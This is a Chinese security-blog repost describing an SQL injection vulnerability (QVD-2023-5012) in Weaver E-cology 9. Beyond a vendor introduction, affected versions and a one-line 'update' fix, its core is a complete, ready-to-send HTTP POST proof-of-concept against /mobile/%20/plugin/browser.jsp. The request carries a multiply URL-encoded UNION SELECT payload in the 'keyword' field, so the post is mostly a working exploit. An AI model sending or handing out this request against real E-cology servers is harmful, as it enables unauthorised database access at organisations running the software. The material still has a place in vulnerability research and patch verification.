泛微 E-cology SQL注入漏洞 (QVD-2023-5012)

admin 2024年5月13日01:08:12评论18 views字数 1659阅读5分31秒阅读模式
声明:请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者和本公众号无关。请遵守《中华人民共和国网络安全法》。

0X01 简介
泛微软件是业界领先的协同管理系统和解决方案供应商,凭借成熟的技术核心及雄厚的研发力量,基于先进的协同管理理念,自主研发了协同管理产品系列,包括泛微协同管理平台(e-cology)、泛微协同办公系统高级版(e-nature)、泛微协同办公系统标准版(e-office)和泛微协同政务系统(e-nation)四大产品系列,涵盖OA(协同办公)、EIP(企业信息门户)、KM(知识管理)、HRM(人力资源管理)、CRM(客户关系管理)、WM(工作流程管理)、PM(项目管理)、电子政务、内外网一体化管理等方面,并通过大量的客户积累和丰富的实践经验,在集团管理、高新技术、生产制造、咨询顾问、医药通信、房地产、酒店餐饮、金融业等领域形成了一整套成熟的行业解决方案。
官网:
https://www.weaver.com.cn/
漏洞编号:
QVD-2023-5012
影响范围:

泛微 E-cology9 <= 10.55

0X02 漏洞复现
【漏洞复现】泛微 E-cology SQL注入漏洞 (QVD-2023-5012)
POC:
POST /mobile/%20/plugin/browser.jsp HTTP/1.1Host: 192.168.17.131User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1If-Modified-Since: Tue, 29 Oct 2019 02:49:52 GMTIf-None-Match: "/EskrA3/OXo"Content-Type: application/x-www-form-urlencodedContent-Length: 649

isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2536%2534%2525%2536%2532%2525%2535%2566%2525%2536%2565%2525%2536%2531%2525%2536%2564%2525%2536%2535%2525%2532%2538%2525%2532%2539%2525%2532%2539%2525%2532%2562%2525%2532%2537
【漏洞复现】泛微 E-cology SQL注入漏洞 (QVD-2023-5012)

0X03 修复建议

更新至最新版!

原文始发于微信公众号(皓月的笔记本):【漏洞复现】泛微 E-cology SQL注入漏洞 (QVD-2023-5012)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月13日01:08:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   泛微 E-cology SQL注入漏洞 (QVD-2023-5012)https://cn-sec.com/archives/2077442.html

发表评论

匿名网友 填写信息